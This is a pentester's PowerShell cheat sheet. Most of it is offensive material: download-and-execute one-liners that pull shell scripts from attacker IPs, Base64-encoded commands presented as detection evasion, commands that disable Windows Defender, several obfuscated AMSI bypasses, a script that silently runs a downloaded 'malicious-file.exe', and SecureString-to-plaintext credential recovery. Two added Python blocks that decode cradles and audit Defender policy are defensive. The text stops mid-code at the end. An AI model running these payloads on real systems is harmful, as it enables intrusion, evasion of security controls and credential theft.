Basic PowerShell for Pentesters
Default PowerShell locations
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
Basic PS commands to get started
This section covers basic PowerShell commands that are useful to pentesters; they help you get started and understand the PowerShell environment.
Get-Command
Lists all the commands available in PowerShell.
Get-Command
Get-Help
Shows detailed help for a given PowerShell command.
Get-Help <command>
Get-Member
Shows the properties and methods available on a given object.
<object> | Get-Member
Get-Process
Lists the processes currently running on the system.
Get-Process
Get-Service
Lists the services registered on the system.
Get-Service
Get-EventLog
Reads the event logs on the system.
Get-EventLog -LogName <log_name>
Get-WmiObject
Queries information from WMI (Windows Management Instrumentation).
Get-WmiObject -Class <class> -Namespace <namespace>
Get-ChildItem
Lists the items inside a given directory.
Get-ChildItem -Path <path>
Set-Location
Changes the current directory in PowerShell.
Set-Location -Path <path>
Clear-Host
Clears the PowerShell screen.
Clear-Host
Exit
Ends the PowerShell session.
Exit
These are only some of the basic PowerShell commands used in pentesting; learning and understanding them is an important first step in working with PowerShell.
Get-Help * #List everything loaded
Get-Help process #List everything containing "process"
Get-Help Get-Item -Full #Get full help about a topic
Get-Help Get-Item -Examples #List examples
Import-Module <modulepath>
Get-Command -Module <modulename>
Download & Execute
To download a file with PowerShell you can use Invoke-WebRequest:
Invoke-WebRequest -Uri <URL> -OutFile <output file>
Replace <URL> with the URL of the file you want to download and <output file> with the name to save it under.
For example, to download a file from http://example.com/file.exe, use:
Invoke-WebRequest -Uri http://example.com/file.exe -OutFile file.exe
This saves the file as file.exe in the current directory. Note that with -OutFile the cmdlet writes to disk and emits nothing on the pipeline, so appending | Invoke-Expression does not run anything: Invoke-Expression evaluates script text, which is what the iex (iwr ...) one-liners below rely on.
Keep in mind that executing files downloaded from untrusted sources can be dangerous. Always exercise caution and ensure the file is from a trusted source before executing it.
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1"); $r = $wr.GetResponse(); IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
#https://twitter.com/Alh4zr3d/status/1566489367232651264
#host a text record with your payload at one of your (unburned) domains and do this:
powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
Download and Execute in the Background and Bypass AMSI
This technique allows you to download and execute a file in the background while bypassing AMSI (Antimalware Scan Interface).
PowerShell Script
$URL = "http://example.com/malicious-file.exe"
$Output = "C:\Temp\malicious-file.exe"
# Download the file
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($URL, $Output)
# Bypass AMSI
$Bypass = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static')
$Bypass.SetValue($null,$true)
# Execute the file
Start-Process -FilePath $Output -WindowStyle Hidden
Explanation
- Set the $URL variable to the URL of the malicious file you want to download.
- Set the $Output variable to the desired location and name of the downloaded file.
- The script uses the System.Net.WebClient class to download the file from the specified URL and save it to the specified output location.
- The script then bypasses AMSI by accessing the amsiInitFailed field of the System.Management.Automation.AmsiUtils class and setting it to $true.
- Finally, the script executes the downloaded file using the Start-Process cmdlet with the -WindowStyle Hidden parameter to run it in the background without displaying any windows.
Usage
Save the PowerShell script to a file with a .ps1 extension (e.g., download_execute.ps1). Open a PowerShell session, navigate to the directory where the script is saved and run it by typing .\download_execute.ps1 and pressing Enter. The file will be downloaded and executed in the background, bypassing AMSI.
Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc <BASE64_ENCODED_COMMAND>"
Using base64 from Linux
To encode or decode Base64 strings from the command line on Linux, use the base64 utility (part of coreutils), which converts data to and from Base64.
To encode a string to Base64:
echo -n "string_to_encode" | base64
To decode a Base64 string:
echo -n "base64_string_to_decode" | base64 -d
Replace "string_to_encode" with the actual string you want to encode, and "base64_string_to_decode" with the Base64 string you want to decode.
Note: the -n option prevents echo from appending a newline character to the string. For PowerShell's -enc/-EncodedCommand the text must first be converted to UTF-16LE, which is why the next command pipes through iconv:
echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
Download
System.Net.WebClient
You can use the System.Net.WebClient class in PowerShell to download a file from the network, with the following steps:
$webClient = New-Object System.Net.WebClient
$url = "FILE_URL"
$path = "PATH_TO_SAVE_FILE"
$webClient.DownloadFile($url, $path)
For example, to download the file at https://www.example.com/file.txt and save it to C:\Downloads\file.txt, use:
$webClient = New-Object System.Net.WebClient
$url = "https://www.example.com/file.txt"
$path = "C:\Downloads\file.txt"
$webClient.DownloadFile($url, $path)
This downloads the file from the given URL and saves it at the given path.
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest
Invoke-WebRequest is a PowerShell cmdlet that sends an HTTP or HTTPS request to a web server. It is useful in network security testing and vulnerability assessment.
Typically Invoke-WebRequest is used to fetch the content of a web page, such as HTML, XML or JSON. It can also perform other actions, such as sending POST data or handling web cookies.
For example, you can use Invoke-WebRequest to make a GET request to a web page and parse the response for useful information such as IP addresses, HTTP headers or hidden content.
In short, Invoke-WebRequest is a powerful tool in the pentester's playbook and can be used effectively in network security assessments.
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
Wget
On Windows, wget is available inside PowerShell as an alias of Invoke-WebRequest (as is curl), so it accepts the same parameters, such as -OutFile. It lets users download files from web servers easily, whether music, video, images or text documents, and is a useful tool for technology and network enthusiasts.
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
BITS Transfer
BitsTransfer is a PowerShell module for transferring files between computers. It can be used for transfers over the network, such as downloading a file from a server or uploading a file to one.
Starting a BITS transfer
Start the transfer with the following command. With -Asynchronous the cmdlet returns a job object that you can track; without it, the cmdlet blocks until the transfer finishes and returns nothing:
$Job = Start-BitsTransfer -Source <source_path> -Destination <destination_path> -Asynchronous
where <source_path> is the path or URL of the source file and <destination_path> is the destination path.
Checking transfer progress
You can check the progress of the transfer with:
Get-BitsTransfer -JobId $Job.JobId
Suspending a BITS transfer
If you need to pause the transfer, use Suspend-BitsTransfer (and Resume-BitsTransfer to continue it):
Suspend-BitsTransfer -BitsJob $Job
Completing or cancelling a BITS transfer
Once the job reports the Transferred state, finalise it so the file is written to its destination; Remove-BitsTransfer instead cancels the job and discards its temporary files:
Complete-BitsTransfer -BitsJob $Job
Remove-BitsTransfer -BitsJob $Job
Conclusion
BITS transfer is a useful PowerShell facility for moving files between computers. It supports several transfer modes and gives an easy way to monitor and control the progress of a transfer.
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $output
# OR
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
Base64 on Kali & EncodedCommand
Base64 on Kali
Kali Linux ships the base64 utility, which easily converts data to Base64. This is very useful in network hacking, since it lets you encode data to hide important information.
Use the following command on Kali Linux to convert data to Base64:
echo -n "data" | base64
Replace "data" with the actual data you want to convert to Base64.
EncodedCommand
When doing network hacking we often need to hide our PowerShell commands to avoid detection by security tools. One way is the EncodedCommand feature of PowerShell.
EncodedCommand lets us pass PowerShell commands in Base64 form. This means our commands are obfuscated and are not easily detected by security tools. Note that the parameter expects the Base64 of the UTF-16LE encoding of the command, which is why the Kali one-liner below converts with iconv before base64.
Use the following command in PowerShell to run a command hidden with EncodedCommand:
powershell.exe -EncodedCommand "base64_encoded_command"
Replace "base64_encoded_command" with your command converted to Base64.
Keep in mind that commands hidden with EncodedCommand can still be detected by capable security tools. It is therefore important to be aware of your environment and take additional protective measures when doing network hacking.
kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
PS> powershell -EncodedCommand <Base64>
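The encoding shown above is easy to reverse, which is what a defender triaging process-creation logs does. The following is an added example for that purpose (not code from the original page): it decodes an -EncodedCommand payload back to UTF-16LE text and checks it for the download-cradle indicators this page lists. The log lines are constructed samples and 203.0.113.5 is a documentation address.

```python
"""Decode PowerShell -EncodedCommand payloads and flag download cradles.

Added example for defenders (not from the original page): triage
process-creation log lines by reversing the encoding shown above
(UTF-16LE text -> Base64) and checking the decoded script for the
download-and-execute indicators listed on this page. All log lines
are constructed samples; 203.0.113.5 is a documentation address.
"""
import base64
import re
from typing import Dict, List, Optional

# Indicators drawn from the cradles on this page.
CRADLE_PATTERNS = {
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "webclient": re.compile(r"net\.webclient", re.I),
    "downloadstring": re.compile(r"\.downloadstring\(", re.I),
    "iwr": re.compile(r"\b(iwr|invoke-webrequest)\b", re.I),
    "url": re.compile(r"https?://[^\s'\"()]+", re.I),
}


def is_encoded_flag(token: str) -> bool:
    """True for -e, -ec, -enc, -EncodedCommand and any prefix PowerShell accepts."""
    if not token or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or (name != "" and "encodedcommand".startswith(name))


def encode_command(script: str) -> str:
    """Same transform as `iconv -t UTF-16LE | base64 -w0` on Linux."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_command: Base64 -> bytes -> UTF-16LE text."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script from a powershell command line, or None if absent."""
    tokens = [t.strip("\"'") for t in cmdline.split()]
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            try:
                return decode_encoded_command(tokens[i + 1])
            except (ValueError, UnicodeDecodeError):
                return None  # flag present but payload is not valid Base64/UTF-16LE
    return None


def triage(cmdline: str) -> Dict[str, object]:
    """Decode the command line if it is encoded and report cradle indicators."""
    script = extract_encoded_command(cmdline)
    text = script if script is not None else cmdline
    hits = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(text)]
    # A cradle needs both a fetch (WebClient/IWR) and an evaluation (IEX).
    fetch = any(h in hits for h in ("downloadstring", "iwr", "webclient"))
    return {
        "encoded": script is not None,
        "script": text,
        "indicators": hits,
        "urls": CRADLE_PATTERNS["url"].findall(text),
        "suspicious": "iex" in hits and fetch,
    }


# Constructed sample log lines (command lines as logged by Sysmon event 1 / 4688).
SAMPLE_LOGS: List[str] = [
    "powershell.exe -NoProfile -Command Get-Service",
    "powershell -nop -w hidden -enc " + encode_command(
        "IEX(New-Object Net.WebClient).downloadString('http://203.0.113.5:8000/x.ps1')"),
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(triage(line))
```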
Execution Policy
Constrained Language
AppLocker Policy
Enable WinRM (PS Remoting)
enable-psremoting -force #This enables winrm
# Change NetWorkConnection Category to Private
#Requires -RunasAdministrator
Get-NetConnectionProfile |
Where{ $_.NetWorkCategory -ne 'Private'} |
ForEach {
$_
$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
}
Disable Defender
{% code overflow="wrap" %}
# Check status
Get-MpComputerStatus
Get-MpPreference | select Exclusion* | fl #Check exclusions
# Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
Set-MpPreference -ExclusionPath (pwd) -disablerealtimemonitoring
Add-MpPreference -ExclusionPath (pwd)
# Check exclusions configured via GPO
Parse-PolFile .\Registry.pol
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0
{% endcode %}
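The Parse-PolFile output above is the format a defender works through when auditing what a GPO enforces on Defender. The following is an added example (not code from the original page) that parses those KeyName/ValueName/ValueType/ValueData records and reports the GPO exclusions and the DisableAntiSpyware setting; SAMPLE_POL_OUTPUT is a constructed sample modelled on the page's output.

```python
"""Audit Defender policy settings from Parse-PolFile style output.

Added example, not from the original page: parses the KeyName/ValueName/
ValueType/ValueData records that Parse-PolFile (GPRegistryPolicy module)
prints for a Registry.pol and reports what a defender should review:
GPO-enforced exclusion paths/processes/extensions and DisableAntiSpyware.
SAMPLE_POL_OUTPUT is a constructed sample modelled on the page's output.
"""
from typing import Dict, List

DEFENDER_KEY = r"software\policies\microsoft\windows defender"
EXCLUSION_KINDS = ("paths", "processes", "extensions")

SAMPLE_POL_OUTPUT = """\
KeyName : Software\\Policies\\Microsoft\\Windows Defender\\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1
KeyName : Software\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths
ValueName : C:\\Windows\\Temp
ValueType : REG_SZ
ValueLength : 4
ValueData : 0
KeyName : Software\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Processes
ValueName : C:\\Tools\\agent.exe
ValueType : REG_SZ
ValueLength : 4
ValueData : 0
KeyName : Software\\Policies\\Microsoft\\Windows Defender
ValueName : DisableAntiSpyware
ValueType : REG_DWORD
ValueLength : 4
ValueData : 1
"""


def parse_pol_records(text: str) -> List[Dict[str, str]]:
    """Split Format-List style output into records; a new record starts at KeyName."""
    records: List[Dict[str, str]] = []
    current = None
    for line in text.splitlines():
        if ":" not in line:
            continue  # blank lines or separators between records
        # partition on the first colon so values like C:\Windows\Temp survive
        field, _, value = line.partition(":")
        field, value = field.strip(), value.strip()
        if field == "KeyName":
            current = {}
            records.append(current)
        if current is not None:
            current[field] = value
    return records


def audit_defender_policy(text: str) -> Dict[str, object]:
    """Return GPO-enforced exclusions and whether Defender is disabled by policy."""
    findings = {
        "exclusions": {kind: [] for kind in EXCLUSION_KINDS},
        "antispyware_disabled": False,
    }
    for rec in parse_pol_records(text):
        key = rec.get("KeyName", "").lower()
        name = rec.get("ValueName", "")
        if not key.startswith(DEFENDER_KEY):
            continue
        if key == DEFENDER_KEY and name.lower() == "disableantispyware":
            findings["antispyware_disabled"] = rec.get("ValueData") == "1"
        for kind in EXCLUSION_KINDS:
            # Under Exclusions\<kind> the excluded item is the value *name*,
            # exactly as in the page's sample (ValueName : C:\Windows\Temp).
            if key == DEFENDER_KEY + "\\exclusions\\" + kind:
                findings["exclusions"][kind].append(name)
    return findings


if __name__ == "__main__":
    print(audit_defender_policy(SAMPLE_POL_OUTPUT))
```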
AMSI Bypass
amsi.dll is loaded into your process and exposes the exports any application needs to interact with it. Because it is loaded into the memory space of a process you control, you can change its behaviour by overwriting instructions in memory. This makes it detect nothing.
So the goal of an AMSI bypass is to overwrite that DLL's instructions in memory to make detection useless.
AMSI bypass generator web page: https://amsi.fail/
# A Method
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
$A="5492868772801748688168747280728187173688878280688776828"
$B="1173680867656877679866880867644817687416876797271"
[Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " " ).
GetField([string](38..51|%{[char][int](29+($A+$B).
substring(($_*2),2))})-replace " ",'NonPublic,Static').
SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
&( $SHELLid[1]+$SHELlId[13]+'X') (NeW-OBJEct sYStEm.iO.coMPrESSIOn.defLAtEstReam( [iO.meMorYStReAm] [cOnvErt]::froMBaSE64StRINg( 'rVHRasJAEHzvdwhGkBAhLUXwYU7i2aKFq4mQBh8Sc6bBM5HkYmq/vruQfkF7L3s7s8vM3CXv+nRw0bb6kpm7K7UN71ftjJwk1F/WDapjnZdVcZjPo6qku+aRnW0Ic5JlXd10Y4lcNfVFpK1+8gduHPXiEestcggD6WFTiDfIAFkhPiGP+FDCQkbce1j6UErMsFbIesYD3rtCPhOPDgHtKfENecZe0TzVDNRjsRhP6LCpValN/g/GYzZGxlMlXiF9rh6CGISToZ6Nn3+Fp3+XCwtxY5kIlF++cC6S2WIDEfJ7xEPeuMeQdaftPjUdfVLVGTMd2abTk4cf'), [sysTEm.iO.cOmpResSioN.COMprEssiOnMOde]::decOMPRESs ) | foreAch{NeW-OBJEct iO.STREaMREadER( $_ , [teXt.ENCoDiNg]::aScii )}).REadtoenD( )
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
${2}=[Ref].Assembly.GetType('Sy'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGUA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bQAuAE0A')))+'an'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBnAGUA')))+'m'+'en'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dAAuAEEAdQA=')))+'t'+'om'+'at'+'io'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgAuAEEA')))+'ms'+'i'+'U'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('dABpAGwA')))+'s')
${1}=${2}.GetField('am'+'s'+'iI'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBpAHQA')))+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RgBhAGkAbAA=')))+'ed','No'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('bgBQAHUA')))+'bl'+'i'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwAsAFMA')))+'ta'+'ti'+'c')
${1}.SetValue($null,$true)
# Another Method
$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$field.SetValue($null,$true)
# AMSI Bypass in python
https://fluidattacks.com/blog/amsi-bypass-python/
# Testing for Amsi Bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass
# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html
AMSI Bypass 2 - Managed API Call Hooking
Check this post for detailed information and the code. Introduction:
This new technique relies on API call hooking of .NET methods. As it turns out, .NET methods need to be compiled to native machine instructions in memory, which end up looking very similar to native methods. These compiled methods can be hooked to change the control flow of a program.
The steps to perform API call hooking of .NET methods are:
- Identify the target method to hook
- Define a method with the same function prototype as the target
- Use reflection to find the methods
- Ensure each method has been compiled
- Find the location of each method in memory
- Overwrite the target method with instructions pointing to our malicious method
AMSI Bypass 3 - SeDebug Privilege
Following this guide & code you can see how, with enough privileges to debug processes, you can spawn a powershell.exe process, debug it, monitor when it loads amsi.dll and disable it.
AMSI Bypass - More Resources
PS History
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
Find newer files
Options: CreationTime, CreationTimeUtc, LastAccessTime, LastAccessTimeUtc, LastWriteTime, LastWriteTimeUtc
# LastAccessTime:
(gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
# LastWriteTime:
(gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName
Get permissions
To determine the permissions of a file or directory in Windows, you can use the Get-Acl cmdlet in PowerShell. This cmdlet retrieves the access control list (ACL) for the specified object.
Get-Acl -Path C:\path\to\file.txt
This command will display the permissions associated with the specified file or directory. The output will include information such as the owner, group, and individual permissions for different users or groups.
To view the permissions for multiple files or directories, you can use wildcards or specify multiple paths separated by commas.
Get-Acl -Path C:\path\to\file1.txt, C:\path\to\file2.txt
Get-Acl -Path C:\path\to\directory\*
By examining the permissions, you can identify any potential security vulnerabilities or misconfigurations that may exist. This information can be useful for conducting a thorough security assessment or penetration test.
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
OS Version and HotFixes
Identifying the operating system (OS) version and installed HotFixes is important during a security assessment. Here are several ways to do it with PowerShell:
Identifying the OS version
Use the following PowerShell command to find the operating system version:
(Get-WmiObject Win32_OperatingSystem).Caption
Identifying HotFixes
Use the following PowerShell command to list the HotFixes installed on the operating system:
Get-HotFix
With these PowerShell commands you can gather useful information about the operating system version and the HotFixes installed on your system. This information is valuable in a security assessment and for making sure the system is up to date and secure.
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches
Environment
The following are the recommended requirements for setting up the environment for basic PowerShell usage:
- Windows operating system (preferably Windows 10 or later)
- PowerShell version 5.1 or later
- Administrative privileges on the system
PowerShell Basics
PowerShell is a powerful scripting language and command-line shell that is built on the .NET framework. It provides a wide range of functionalities for system administration, automation, and configuration management.
PowerShell Command Syntax
PowerShell commands follow a verb-noun syntax, where the verb represents the action to be performed and the noun represents the target object. For example, Get-Process is a command that retrieves information about running processes.
Running PowerShell Commands
PowerShell commands can be executed in the following ways:
- Interactive Mode: Launch the PowerShell console and type the command directly.
- Script Mode: Create a PowerShell script file with the .ps1 extension and execute it using the .\ prefix followed by the script name.
- Command Line Mode: Run PowerShell commands directly from the command prompt by using the powershell command followed by the desired command.
PowerShell Help System
PowerShell provides a comprehensive help system that allows users to access detailed information about commands, modules, and concepts. The Get-Help command is used to retrieve help content.
To get help for a specific command, use the following syntax:
Get-Help <command>
For example, to get help for the Get-Process command, use:
Get-Help Get-Process
PowerShell Variables
Variables in PowerShell are used to store and manipulate data. They are represented by a dollar sign $ followed by the variable name. PowerShell variables are case-insensitive.
To assign a value to a variable, use the following syntax:
$variableName = value
For example, to assign the value Hello, World! to a variable named message, use:
$message = "Hello, World!"
PowerShell Pipelines
PowerShell pipelines allow the output of one command to be passed as input to another command. The pipeline operator | is used to connect commands together.
For example, to retrieve the list of running processes and filter the results to only display the ones with the name chrome, use:
Get-Process | Where-Object { $_.Name -eq "chrome" }
PowerShell Modules
PowerShell modules are self-contained packages that contain cmdlets, functions, and other resources. They provide additional functionality and can be imported into a PowerShell session using the Import-Module command.
To import a module, use the following syntax:
Import-Module <moduleName>
For example, to import the ActiveDirectory module, use:
Import-Module ActiveDirectory
PowerShell Execution Policy
PowerShell execution policy determines the security level of script execution. It can be set to one of the following values:
- Restricted: No scripts are allowed to run.
- AllSigned: Only scripts signed by a trusted publisher are allowed to run.
- RemoteSigned: Scripts downloaded from the internet must be signed by a trusted publisher.
- Unrestricted: All scripts can run without any restrictions.
To check the current execution policy, use the following command:
Get-ExecutionPolicy
To change the execution policy, use the following command:
Set-ExecutionPolicy <policy>
Replace <policy> with the desired execution policy value.
PowerShell Aliases
PowerShell aliases are shortcuts for commands or command sequences. They allow users to create custom names for frequently used commands or command combinations.
To view the list of available aliases, use the following command:
Get-Alias
To create a new alias, use the following command:
Set-Alias -Name <aliasName> -Value <command>
Replace <aliasName> with the desired alias name and <command> with the command or command sequence to be aliased.
PowerShell Profiles
PowerShell profiles are scripts that are automatically executed when a PowerShell session starts. They can be used to customize the environment and define custom functions, aliases, and variables.
To create a profile, use the following command:
New-Item -Type File -Path $PROFILE -Force
This will create a new profile file if it doesn't exist. Open the profile file using a text editor and add the desired customizations.
PowerShell Remoting
PowerShell remoting allows users to run PowerShell commands on remote systems. It enables remote administration and automation of tasks across multiple machines.
To enable PowerShell remoting, use the following command:
Enable-PSRemoting
This command needs to be run with administrative privileges.
To connect to a remote system, use the following command:
Enter-PSSession -ComputerName <computerName>
Replace <computerName> with the name or IP address of the remote system.
To exit the remote session, use the following command:
Exit-PSSession
PowerShell Scripting
PowerShell scripts are text files that contain a series of PowerShell commands. They can be used to automate tasks, perform system administration tasks, and execute complex operations.
To create a PowerShell script, open a text editor and save the file with the .ps1 extension. Write the desired PowerShell commands in the file and save it.
To execute a PowerShell script, use the following command:
.\<scriptName>.ps1
Replace <scriptName> with the name of the script file.
PowerShell One-Liners
PowerShell one-liners are single-line commands that perform a specific task. They are useful for quick and concise operations.
For example, to retrieve the list of running processes and display only the ones with a specific name, use:
Get-Process | Where-Object { $_.Name -eq "<processName>" }
Replace <processName> with the desired process name.
Conclusion
This guide provides a basic overview of PowerShell and its usage. Understanding these fundamentals will help you leverage the power of PowerShell for various tasks, including system administration, automation, and configuration management.
Get-ChildItem Env: | ft Key,Value #get all values
$env:UserName #Get UserName value
Other connected drives
To check for other connected drives in PowerShell, you can use the following command:
Get-PSDrive
This command lists all the drives currently available in the session: file system drives (local disks and mapped network shares) as well as provider drives such as the registry (HKLM:, HKCU:), Env: and Cert:.
To filter the results to a single provider, use the -PSProvider parameter. For example, to display only file system drives (local and network), use:
Get-PSDrive -PSProvider FileSystem
By using the Get-PSDrive command, you can easily identify and access other connected drives in PowerShell.
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
Recycle Bin
The Recycle Bin is where files deleted on a Windows system are kept before being permanently removed. This lets users recover files that were deleted by accident or on purpose.
The Recycle Bin can hold information of interest to an attacker or to a forensic examiner, for example deleted files containing sensitive or confidential data. As a pentester it is therefore worth inspecting the Recycle Bin for useful information.
There are several ways to reach the Recycle Bin on Windows. One of them is PowerShell, the Windows scripting language that can be used for all kinds of offensive tasks.
With PowerShell you can list the items in the Recycle Bin, restore deleted files, or even delete the files it holds, which can be useful to an attacker or an examiner.
In summary, the Recycle Bin is an important part of Windows that can yield useful information to an attacker or examiner, and with PowerShell you can list, restore or delete its contents.
$shell = New-Object -com shell.application
$rb = $shell.Namespace(10)
$rb.Items()
https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/
Domain Recon
{% content-ref url="powerview.md" %} powerview.md {% endcontent-ref %}
Users
Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name
Secure String to Plaintext
There are two common ways to turn a secure string back into plaintext with PowerShell.
Method 1: marshal the SecureString to a BSTR
This needs the SecureString object itself in the current session:
$secureString = ConvertTo-SecureString -String "MySecurePassword" -AsPlainText -Force
$plainText = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))
Method 2: rebuild the SecureString from its exported form
A SecureString exported with ConvertFrom-SecureString (or Export-CliXml) is stored as a long hex string protected with DPAPI, so it can only be rebuilt with ConvertTo-SecureString by the same user account on the same machine that exported it. Once rebuilt, wrapping it in a PSCredential exposes the plaintext through GetNetworkCredential():
```powershell
$pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | fl
```
Output:
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
Or parse it directly from the XML:
$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
SUDO
sudo is a program found on Linux systems that lets a user run commands as another user, usually the root user. This gives the ability to work with elevated privileges and run commands that need special permissions.
For pentesters, sudo can be a powerful tool. For example, if you gain access to a user who is allowed to run certain commands through sudo, you can run those commands on their behalf, which may give you elevated privileges and the ability to make changes to the system.
There are several ways to check whether a user has sudo rights and which commands they may run through sudo. One of them is the "sudo -l" command, which lists the commands the user can run through sudo.
It is important for pentesters to understand how sudo works and how to use it effectively; that way you can gain higher privileges and carry out a thorough assessment of the system.
```powershell
#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
#For local:
